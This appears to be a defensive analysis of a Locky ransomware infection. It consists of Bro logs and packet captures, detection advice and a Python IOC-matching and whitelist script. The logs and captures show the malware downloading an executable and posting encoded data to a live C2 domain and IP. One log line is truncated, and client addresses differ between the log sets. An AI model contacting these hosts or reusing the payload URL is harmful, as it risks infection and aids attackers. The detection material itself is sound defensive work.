root@computersecurity:/var/log/bro/2016-06-28# zcat http.17\:00\:00-18\:00\:00.log.gz | grep 217.74.66.167
1467148303.427135       ChxVZM3W6tGn0jM9ad      192.168.1.100  39868   217.74.66.167   80      1       –       –       –       –       –       0       269106  200     OK      –       –       –       (empty) –       –       –       – FEQjwH1zOtgq0XUwd        application/x-dosexec
1467148303.428111       CDKmDc28png4js7QY1      192.168.1.100   39868   217.74.66.167   80      1       –       –       –       –       –       0       269106  200     OK      –       –       –       (empty) –       –       –       – F3ZsZV32sDWqH6jLFj       application/x-dosexec

Bro's PE analyzer also writes a pe.log entry for each Windows executable it parses, which tells you a few things before any sandbox sees the file: compile_ts 1467118146 is about eight hours before the download at 1467148303, so the binary was built the same day it was delivered, and has_cert_table F means it is unsigned (a 32-bit GUI executable with ASLR enabled but no DEP).

root@computersecurity:/var/log/bro/2016-06-28# zcat pe.17\:00\:00-18\:00\:00.log.gz
#separator \x09
#set_separator  ,
#empty_field    (empty)
#unset_field    –
#path   pe
#open   2016-06-28-17-11-45
#fields ts      id      machine compile_ts      os      subsystem       is_exe  is_64bit        uses_aslr       uses_dep        uses_code_integrity     uses_seh        has_import_table        has_export_table        has_cert_table  has_debug_data     section_names
#types  time    string  string  time    string  string  bool    bool    bool    bool    bool    bool    bool    bool    bool    bool    vector[string]
1467148303.427546       FEQjwH1zOtgq0XUwd       I386    1467118146.000000       Windows XP      WINDOWS_GUI     T       F       T       F       F       T       T       F       F       T       .text,.rdata,.data,.rsrc,.reloc
1467148303.429271       F3ZsZV32sDWqH6jLFj      I386    1467118146.000000       Windows XP      WINDOWS_GUI     T       F       T       F       F       T       T       F       F       T       .text,.rdata,.data,.rsrc,.reloc
#close  2016-06-28-18-00-00

root@computersecurity:/var/log/bro/2016-06-28# zcat dns.17\:00\:00-18\:00\:00.log.gz | grep 217.74
1467148303.153851       CAGAOC2ltPBR0uP1fj      192.168.1.100   48407   75.75.75.75     53      udp     6278    ratownictwo.strefa.pl   –       –       –       –       0       NOERROR F       F       F       T       0       217.74.66.167      600.000000      F
1467148303.153406       CC6Pi1y2ccItuEWSd       192.168.1.100 53627   75.75.75.75     53      udp     6278    ratownictwo.strefa.pl   –       –       –       –       0       NOERROR F       F       F       T       0       217.74.66.167      600.000000      F

Callback Traffic:

root@computersecurity:/var/log/bro/2016-06-28# zcat conn.18\:00\:00-19\:00\:00.log.gz | grep 151.236.15.226
1467152337.859581 CdsNLi2wzTqFogbC75 192.168.1.100 57436 151.236.15.226 80 tcp http 4.752286 5249 0 S0 T F 0 SAD 14 5821 0 0 (empty)
1467152337.963955 Cib4i04qmEJujDylCf 192.168.1.100 57436 151.236.15.226 80 tcp – 284.882985 0 12631 SHR T F 0 hadf 0 0 28 13763 (empty)
1467152357.463053 CPlEdm3dmsVSNedE32 192.168.1.100 57436 151.236.15.226 80 tcp – 265.384630 3913 0 OTH T F 0 DA 10 4313 0 0 (empty)
1467153134.228094 Cpm6U13YlnzxKjNtmh 192.168.1.100 57436 151.236.15.226 80 tcp – – – – SH T F 0 F 1 40 0 0 (empty)
1467153134.328506 Cp7e6NpP3PwGqcmZb 192.168.1.100 57436 151.236.15.226 80 tcp – – – – RSTRH T F 0 r 0 0 1 40 (empty)
1467153638.321168 CL8b5C1mJEASLDOHA2 192.168.1.100 58128 151.236.15.226 80 tcp http 2.884468 3615 0 S0 T F 0 SAD 12 4107 0 0 (empty)
1467153643.383005 CT8caj2DDA5gKnacu1 192.168.1.100 58128 151.236.15.226 80 tcp – 82.386675 9170 0 SH T F 0 DAF 20 9970 0 0 (empty)
1467153638.425665 Cyb5P42KRdZGCumUk3 192.168.1.100 58128 151.236.15.226 80 tcp – 87.343249 0 12321 SHR T F 0 hadf 0 0 35 13733 (empty)

root@computersecurity:/var/log/bro/2016-06-28# zcat dns.18\:00\:00-19\:00\:00.log.gz | grep .biz
1467152335.499772 CkcKxg3Vgocx5ZP7Jj 192.168.1.100 55462 75.75.75.75 53 udp 18771 wjfkoqueatxdmqw.biz 1 C_INTERNET 1 A – – F F T F 0 – F
1467152336.511728 C4Y4s5z3hBIdCnoe9 192.168.1.100 55463 75.75.75.75 53 udp 18771 wjfkoqueatxdmqw.biz 1 C_INTERNET 1 A – – F F T F 0 – F
1467152337.505404 CvpNyI34kpJnmHYJ6e 192.168.1.100 55462 75.75.76.76 53 udp 18771 wjfkoqueatxdmqw.biz 1 C_INTERNET 1 A – – F F T F 0 – F
1467152337.505803 CjkpHg1Wv2ApzPn2D1 192.168.1.100 55464 75.75.75.75 53 udp 18771 wjfkoqueatxdmqw.biz 1 C_INTERNET 1 A – – F F T F 0 – F
1467152337.857609 C3u42t4W5TL1Nojhsd 192.168.1.100 24552 75.75.76.76 53 udp 18771 wjfkoqueatxdmqw.biz – – – – 0 NOERROR F F F T 0 151.236.15.226 600.000000 F
1467152338.505541 Co5Hqy1qM8cU8rcph 192.168.1.100 55463 75.75.76.76 53 udp 18771 wjfkoqueatxdmqw.biz 1 C_INTERNET 1 A – – F F T F 0 – F
1467152338.843204 Ccl0T84oBNlsGJcE6c 192.168.1.100 50262 75.75.76.76 53 udp 18771 wjfkoqueatxdmqw.biz – – – – 0 NOERROR F F F T 0 151.236.15.226 600.000000 F
1467152339.507084 CVEg303R9VQw6MigZk 192.168.1.100 55464 75.75.76.76 53 udp 18771 wjfkoqueatxdmqw.biz 1 C_INTERNET 1 A – – F F T F 0 – F

root@computersecurity:/var/log/bro/2016-06-28# zcat files.18\:00\:00-19\:00\:00.log.gz | grep 151.236.15.226
1467152338.072969       FUEGOP2CN9E2bA2xIf      192.168.1.100   151.236.15.226  CdsNLi2wzTqFogbC75      HTTP    0       SHA1,MD5        text/plain      –       0.000000        T       T       1126    1126    0       0       F       – 873420329f0835e13de6b696e31353e8 f933bcc846985318b2b574801e442ab98494b14b        –       –
1467152338.467968       FJQWHF1BLLIO3la3p1      151.236.15.226  192.168.1.100  Cib4i04qmEJujDylCf      HTTP    0       SHA1,MD5        –       –       0.000000        F       F       313     313     0       0       F       –       2986b2044d6bb6a5dafb4e2966c26d1a   9f6a15adf63c7c2b1ae5bbaa627742db86fceade        –       –
1467152338.581431       F4FVGV3dQLX8tHAir6      192.168.1.100   151.236.15.226  CdsNLi2wzTqFogbC75      HTTP    0       SHA1,MD5        text/plain      –       0.000000        T       T       790     790     0       0       F       – 9697ae3ef8f8f7ce2c6c70c69690ff16 26b0b1cbc1be7361db78b125bd2a9df05b5b7df1        –       –
1467152338.966439       FFqoA33xdIAhANt7nd      151.236.15.226  192.168.1.100  Cib4i04qmEJujDylCf      HTTP    0       SHA1,MD5        –       –       0.000000        F       F       1195    1195    0       0       F       –       f7d46ab6b7754b656669da1046c77e30   8058dabfe112e1d84458170c01292423f3f8aa2b        –       –
1467152338.968820       F3vIQz1MXORQkl871i      192.168.1.100   151.236.15.226  CdsNLi2wzTqFogbC75      HTTP    0       SHA1,MD5        text/plain      –       0.000000        T       T       490     490     0       0       F       – 2bf68f81591033199bdb28b2bd7aadc8 ad28c783a43dfa1594d44d1a96d4482248a9d113        –       –
1467152339.368526       FY1BJMa0OBilCocI1       151.236.15.226  192.168.1.100  Cib4i04qmEJujDylCf      HTTP    0       SHA1,MD5        –       –       0.070727        F       F       9491    9491    0       0       F       –       26931832cc92296c9c037803530da456   a0bf3aea40193ab452745675b24eeb96c78e6477        –       –
1467152342.155877       FeOxTb4AK7XOgpZ3B4      192.168.1.100   151.236.15.226  CdsNLi2wzTqFogbC75      HTTP    0       SHA1,MD5        text/plain      –       0.000000        T       T       1201    1201
If you write Snort rules in a very paranoid manner you may have caught the payload request, or the POST requests, on the absence of a referrer. Writing Snort rules around URI content is a frivolous endeavour, because almost all crimeware groups these days host their malicious content on hacked infrastructure. If you think a POST request to /wp-content// is a reliable indicator you have much to learn: these kiddies Google-dork for the latest stored XSS and SQLi bugs to upload their package, and there is nothing fixed about that location. If your client base is small enough it is smarter to write rules that alert on binary downloads and on POST requests without referrers using a whitelist: enumerate the hosts your users are allowed to fetch executables from or POST to, and alert on everything else. Note what the capture below actually shows: the GET for locky.exe carries a Firefox 43 User-Agent and no Referer, while the POSTs to wjfkoqueatxdmqw.biz about an hour later come from the same client with an MSIE 7.0 User-Agent and a Referer naming /upload/ on the C2 host itself, a page that does not appear anywhere in the capture. Either inconsistency is enough on its own; with a whitelist in place, flagging this type of traffic as malicious becomes routine.
E..c66…..r…kh.T….P’..@.U.DP…1…GET /images/samples/locky.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

2016-06-28 18:18:57.969089 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [.], ack 2729606803, win 256, length 0
E..(\…..t….k…..\.Pl…..~.P….7……..
2016-06-28 18:18:57.969599 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [P.], seq 0:411, ack 1, win 256, length 411: HTTP: POST /upload/_dispatch.php HTTP/1.1
E…\…..sO…k…..\.Pl…..~.P…”…POST /upload/_dispatch.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://wjfkoqueatxdmqw.biz/upload/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: wjfkoqueatxdmqw.biz
Content-Length: 1126
Connection: Keep-Alive
2016-06-28 18:18:58.072969 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [P.], seq 411:1537, ack 1, win 256, length 1126: HTTP
E…\…..p….k…..\.Pl…..~.P….M..qhhxAGOv=%D1%98%85%5C%05%99lh%F6%FDL%9A%D7%06%18%7B%A9%D15%3A%185%29%12%99BM%A0%C0%BEf%DA&BFfex=%DA%08y%88%AE%08%3C%01%3DO%B8%14B%15%D5&xMvFbKR=M%8D%FF%22%00%1D%D1%AD%AC%C
F9%E5%FBw%D9R%1C%89–%F9%22R%C9%A3%5B4%5CH%27%889Q-%8F%156u%9A%24%AF&xaN=%E0%0F5%CE%27%0B%2A%0A%7CHzu%87%8A%CD%B9%DAD%F2%F9%B0%D6%94gI%0F%3Fp%B0%08%DA3%E5%97%97%C5%7B%AF%1A%95%FC&IbGveoKJ=B%AE%8D%22%EB%F6%08%F6%
7E%D0%8FW9Q%D2%01%B0NE%0C%0E%A5%266%E0%1C%C6vt%3C%D9J%8Et%A0%22&vxzi=%9F%E1%FD%93%0A%E6%FA%3D%F4%99%C6%FE%C7x%BE%B4%14%5D%00%EDp%C3B%1B%26u%A7%0A%CEC%DC%CBi%9D%EB%3F%1F%B64%91%94%C4%80%81yo%0B%09&jGkdcQzo=%E2Z%A
2%A7o%EB%C7%3ECe%C6%A1%F4%A6k0%26%93%9B%B8%9E%0Fb%83%E3kS%16g%D6%FA%B3%FD%FE%E8%FAx%DB%8E%0A%FE%F44%3Cg%18%D6%BA%01%EF&MzAP=%F8%1F%D3zy%C64%FB%1F%97%8A%89%86%82%2CR%C8%FC%18%C7%3Dei%C4%B8%B9%173G&luuff=%CB%09%88
%94%C0%0A%A4%E1%B6%EFY%FB%BCs%3F%C3%FE%B1%A5%DA%2A%B2%2F%04%0B%D0F%BC%28%F3%86%CAE%2F-%D8%BB%87%CBy%3D%EF%A1%DB%B2%BA%60%D3&SjY=%B6%C8%C7%04%E8f%03%07+%40%B6Y%CF%FFV%AF%0B5%A7c%BC8%AE%BF%7C%97Q%D73%1F%BF&IdEM=%9
6%25%DC%40%9F%C1%AF%A8%14%AC%9B%BFf%89%B6%D1%08%FC%90d%B3%8D%05%EF%3E%5EC%E2.y%82%1A%5C%DD%3F%13%CDF%91%BC%E69c
2016-06-28 18:18:58.470622 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [P.], seq 1537:1947, ack 470, win 254, length 410: HTTP: POST /upload/_dispatch.php HTTP/1.1
E…\…..sN…k…..\.Pl……hP…h…POST /upload/_dispatch.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://wjfkoqueatxdmqw.biz/upload/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: wjfkoqueatxdmqw.biz
Content-Length: 790
Connection: Keep-Alive
2016-06-28 18:18:58.581431 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [P.], seq 1947:2737, ack 470, win 254, length 790: HTTP
E..>\…..q….k…..\.Pl……hP…9C..uoYu=o%5C%FF%C8%C0P%EC%25%28%2F%B3%95%F6L%D1%1B%CE%C8R%BEf%ED%D3W%88%89%2F&ERKKdCXA=%C6%8A6%A8j%7Ea.x%1C%D7%03%0D%28IR%EF%F4%04%2F%FFr%B5%89%E8%95%E9%01%D8%99%D2ikiu%9F&brnXZ=_%DA%878%84%90%29%1D%C0rL%CD%13%BEn%F8%AA%B3%842A%F2%B1%03&jhUtKvK=%D6%B4%9AF%18b%0A%A3%B9%8A%1B7%08y%DA%DDF%84Q%14%0Fq%C9%9F%94%0F%AE%A6T%87%8D%A8%E8%A0%DAn%B2%B6%C4%AE+%E2%97&VKTm=%F3%CB%04%AA%ED%D9Ud%21%40%810%3E%DCZP%AC%84%CA%883%FC-%8D.%ADD%92%A1%E0%7DW%84%D7%96Je%FD%F7%0C%BB%E7%FB%02%D5%DF&Rxu=1%FA%94%CF%0F%FC%5EaG%B3%1B%83j%CCBa%DA%A6%A8n%C3%D8%F2C&vbJTIM=o%A8%8A%01%12%B2%AA%9A%C3%A6%84N%ED%12%8D%AF%3E%D8%23%C6%EEN%ED%C8%BC%E4%5B%D9%A9%86%DE%DB%B9%C4%D4%7E&IfQDnFS=%17%DF%1C%2C%7B%B0x%BE+%94SC%24d%97N%F1Q%C0%F1%A3%A6D%AF%8Br_%AC%C8%1Dy%DB%FAK%E0%E3a%0D%12W%C7%E6%98%3C%D1%B2&FFcT=%BF%7BI%1DL%5Ck%E5H%A7M
2016-06-28 18:18:58.968820 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [P.], seq 2737:3637, ack 1822, win 256, length 900: HTTP: POST /upload/_dispatch.php HTTP/1.1
E…\…..qb…k…..\.Pl…….P…p!..POST /upload/_dispatch.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://wjfkoqueatxdmqw.biz/upload/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: wjfkoqueatxdmqw.biz
Content-Length: 490
Connection: Keep-Alive

NrpyxWG=%2C%80%22%FD%92V%2A%8D%CA%2B%BFq%02%EA%5Cf0l%C0%B40%1E%12%F9%84%12%FA%9C1&QWo=%E7%F7%F7%17%89m%3C%D5%88%7F%1F%24%80%90%DA%D7%FCV&nYuMPFS=%AC%3B%B3%F2%96GD_%17%E4%3F%1E%C0%DE%9B%DAI2%F3E%C3PV%85%C1%5Dr%1F%95l%01%5B%00%C9%98ES&wVmT=Z%94%0F%BF5%A1%B4%7C%BD%2A%EB7%0D%5D%E0%DB%7F%D7%1B%CE%81k3x%B3t%AE%EB%84H%B3%3B%84Or%10&RugliT=%1E%2B%B69%0C%18%EA7p%28%E8%E0%8CKSg%DAq%89%00%26%26%93%8F%B5b%10%29%C6&JajgLtjP=%D2%07%7CW%FC%2F%8D%BC%AE%B3Y%DD%06%9D%17%D2%AB%CC%8A%8C%CF%87%E0%1F%22+%7D
2016-06-28 18:18:59.369955 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [.], ack 4742, win 256, length 0
E..(\ ….t….k…..\.Pl../….P….}……..
2016-06-28 18:18:59.371198 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [.], ack 7401, win 256, length 0
E..(\
….t….k…..\.Pl../…{P………….

2016-06-28 18:19:02.054922 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [P.], seq 3637:4048, ack 11470, win 251, length 411: HTTP: POST /upload/_dispatch.php HTTP/1.1
E…\…..sF…k…..\.Pl../…`P…….POST /upload/_dispatch.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://wjfkoqueatxdmqw.biz/upload/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: wjfkoqueatxdmqw.biz
Content-Length: 1201
Connection: Keep-Alive
2016-06-28 18:19:02.155877 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [P.], seq 4048:5249, ack 11470, win 251, length 1201: HTTP
E…\…..p/…k…..\.Pl……`P…….JpByd=x5%90d%F6%0Dy5%C8%A2%A1%D0J%2B%1D%15%87%3F%B4%2C&nJCDmH=%5B%CB%81%80%23%03%E5%3F%E1%A9wN7%E5%C8%D6%B8HMi%A5%A7%5B%60%01Fdi-%D4%F3%F4%3D%93%08q%A5b%9A%B55%15%96%DCW&qdZEWyNE=gY%28%EB%00%E6%0D%DE%5EN9%FFt%26%EA%C8%CE%60%09%03%B3JH&mwjESzr=%FF%D7B%FDr%84%ECT%87%B8%A5%9AS%1E%9D%98%AES%D1%81%D6%A9N%D1%C9%E2f%EA%8ENWi%7D%BF%950%95%BFE&plR=%C4%AEm%01%93%83%C0%9B%D3%7D%1Cx%22e%B5%9DJ%FCF%17%A4%25%3B&qieYfPY=MRR%8FU%CA%24%83%FF%A6%82%D7e%DF%3E%18%BBB%B0&ZjtvTgwY=%5E%D4%B6%F2E%CD%CF%B8%3A%8A%9B%FD%A4%93S%F9mK%B5%AC%22%E3%29%1BM%E7%2B7%E5kiQ%F1%AA%A8%23%EB%B4x%B3%83&olFyl=4G%92%AE%13%B8%18%28%99%E7%3F9D%B0%87%9C%5Bp%CCAQo%0B%269%E4V&kvU=%17%DBS%B2%FB%E3%A8%8D.A%A3%A0%0B%FCn.4%02%25X%88%00MRj%3D%F6%B7%5B%7E&IsEhd=%EB%1Ds%8C%0E%D3Z%E7%F1lp%3F%7E%C2_%C1%BDJ%01%A2%8C%10%A3XDA%B0L%3F%E3&wqfi=%C8L%FAU%B5%8A%0B%7B%0A%B2%D8%18%3BO%EB%AB%23H%BAF%CC%C3h%DBX%A2%0D%B5-%C4%ED%03%08%C8O%8F%C3%D9&PkzlsNj=%29%09%23J%0CkD%BBj1%FB%C2AVV%2Cl%C6%26%9E4%1C%80%3A%A9%034%C9%ED%E63%F2&zKqqM=%CA%86%B4%0Dc%E7%C0%85%9A%0E%E1Z%5B%E9%86%0D%C1%CE%05%3C%85%9D%11%DF%18&qHuJo=g%ABxSUa%F11%C3%9B%05%DB%09%A5%28%AA%C8b%85%0B4n%27k%1BG&EhsFEGN=%88i.n%16%AD3%7E.p%C6%AF%C2%B6%03%9B%2B%E3C%8A%29%1F%FE%F5Oe2%0Et%DF%C3%D9B%CE%85
2016-06-28 18:19:02.611867 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [.], ack 11881, win 256, length 0
E..(\…..t….k…..\.Pl.#{….P….N……..
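As a closing example (added here, not code from the original post or from Bro itself), here is the glue that the two ideas above need in one script: it reads an indicator list in the tab-separated layout Bro's Intel framework consumes, matches hashes, domains and addresses against files.log, dns.log and http.log records, and applies the whitelist rules argued for above (an executable served by a non-whitelisted host; a POST to a non-whitelisted host with no Referer or with a Referer naming a page the client never fetched; one client presenting several User-Agents). All log lines and indicators are constructed from values in this post's own output and trimmed to the columns the script needs; WHITELIST, the vendor-feed source tag and the Host of the GET (inferred from dns.log) are assumptions.

```python
"""Added example, not from the original post: match Bro logs against an IOC
list in intel.dat layout and apply whitelist heuristics.  All logs and
indicators below are constructed from the post's values, column-trimmed."""
from collections import defaultdict
from urllib.parse import urlparse

# Constructed IOC list in Bro intel.dat layout (indicator, type, source).
INTEL_DAT = "\n".join([
    "#fields\tindicator\tindicator_type\tmeta.source",
    "bef0781693c41bcda3000c8f5ca40e3e\tIntel::FILE_HASH\tvendor-feed",
    "869ba5e59470baac4ef0462b8c9923ac70197b05\tIntel::FILE_HASH\tvendor-feed",
    "wjfkoqueatxdmqw.biz\tIntel::DOMAIN\tvendor-feed",
    "151.236.15.226\tIntel::ADDR\tvendor-feed",
])
# Constructed, column-trimmed Bro logs ("-" is Bro's unset marker).
FILES_LOG = "\n".join([
    "#fields\tts\ttx_hosts\trx_hosts\tsource\tmime_type\tmd5\tsha1",
    "1467148303.427135\t217.74.66.167\t192.168.1.100\tHTTP\tapplication/x-dosexec"
    "\tbef0781693c41bcda3000c8f5ca40e3e\t869ba5e59470baac4ef0462b8c9923ac70197b05",
    "1467152338.072969\t192.168.1.100\t151.236.15.226\tHTTP\ttext/plain"
    "\t873420329f0835e13de6b696e31353e8\tf933bcc846985318b2b574801e442ab98494b14b",
])
DNS_LOG = "\n".join([
    "#fields\tts\tid.orig_h\tquery\tanswers",
    "1467148303.153851\t192.168.1.100\tratownictwo.strefa.pl\t217.74.66.167",
    "1467152337.857609\t192.168.1.100\twjfkoqueatxdmqw.biz\t151.236.15.226",
])
HTTP_LOG = "\n".join([  # Host of the GET is inferred from dns.log (assumption)
    "#fields\tts\tid.orig_h\tid.resp_h\tmethod\thost\turi\treferrer\tuser_agent\tresp_mime_types",
    "1467148303.427135\t192.168.1.100\t217.74.66.167\tGET\tratownictwo.strefa.pl"
    "\t/images/samples/locky.exe\t-\tMozilla/5.0 (Windows NT 5.1; rv:43.0) "
    "Gecko/20100101 Firefox/43.0\tapplication/x-dosexec",
    "1467152337.963955\t192.168.1.100\t151.236.15.226\tPOST\twjfkoqueatxdmqw.biz"
    "\t/upload/_dispatch.php\thttp://wjfkoqueatxdmqw.biz/upload/"
    "\tMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)\t-",
])
# Hypothetical allow-list: hosts this client base may fetch executables from or POST to.
WHITELIST = {"download.windowsupdate.com", "updates.corp.example"}
# Columns of each Bro log that an indicator list can be matched against.
INDICATOR_COLUMNS = {"files": ("md5", "sha1", "sha256"), "http": ("host", "id.resp_h"),
                     "conn": ("id.resp_h",), "dns": ("query", "answers")}  # answers: vector


def parse_bro_log(text):
    """Parse a Bro TSV log into dicts named by its #fields header."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif fields and line and not line.startswith("#"):
            rows.append(dict(zip(fields, line.split("\t"))))
    return rows


def load_intel(text):
    """Index indicator (lower-cased) -> (indicator_type, source)."""
    return {r["indicator"].lower(): (r["indicator_type"], r["meta.source"])
            for r in parse_bro_log(text)}


def match_intel(logs, intel):
    """Return (log, ts, column, indicator, type, source) for every hit."""
    hits = []
    for name, rows in logs.items():
        for row in rows:
            for col in INDICATOR_COLUMNS.get(name, ()):
                for value in row.get(col, "-").lower().split(","):
                    if value != "-" and value in intel:
                        hits.append((name, row["ts"], col, value) + intel[value])
    return hits


def whitelist_alerts(http_rows):
    """Executables from non-whitelisted hosts, POSTs to non-whitelisted hosts with
    no Referer or one the client never fetched, and clients using several UAs."""
    fetched = {(r["id.orig_h"], r["host"], r["uri"])
               for r in http_rows if r["method"] == "GET"}
    alerts, agents = [], defaultdict(set)
    for r in http_rows:
        client, host = r["id.orig_h"], r["host"]
        agents[client].add(r["user_agent"])
        if host in WHITELIST:
            continue
        if "application/x-dosexec" in r["resp_mime_types"].split(","):
            alerts.append(("exe-download", client, host, r["uri"]))
        if r["method"] == "POST":
            ref = urlparse(r["referrer"]) if r["referrer"] != "-" else None
            if ref is None or (client, ref.hostname, ref.path) not in fetched:
                alerts.append(("orphan-post", client, host, r["uri"]))
    for client, uas in agents.items():
        if len(uas) > 1:
            alerts.append(("ua-mismatch", client, len(uas), " | ".join(sorted(uas))))
    return alerts


def analyse():
    """Run the intel match and the whitelist heuristics over the constructed logs."""
    logs = {n: parse_bro_log(t) for n, t in
            (("files", FILES_LOG), ("dns", DNS_LOG), ("http", HTTP_LOG))}
    return match_intel(logs, load_intel(INTEL_DAT)), whitelist_alerts(logs["http"])


if __name__ == "__main__":
    for kind, items in zip(("INTEL", "ALERT"), analyse()):
        for item in items:
            print(kind, *item)
```

Because column lookup goes through the #fields header, the same parser takes the real gzipped logs unchanged (read them with gzip.open instead of the inline strings) and the output of a cron-driven feed scraper can be dropped in as INTEL_DAT; that same intel.dat file can also be handed to Bro through Intel::read_files so the match happens inline and lands in intel.log.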

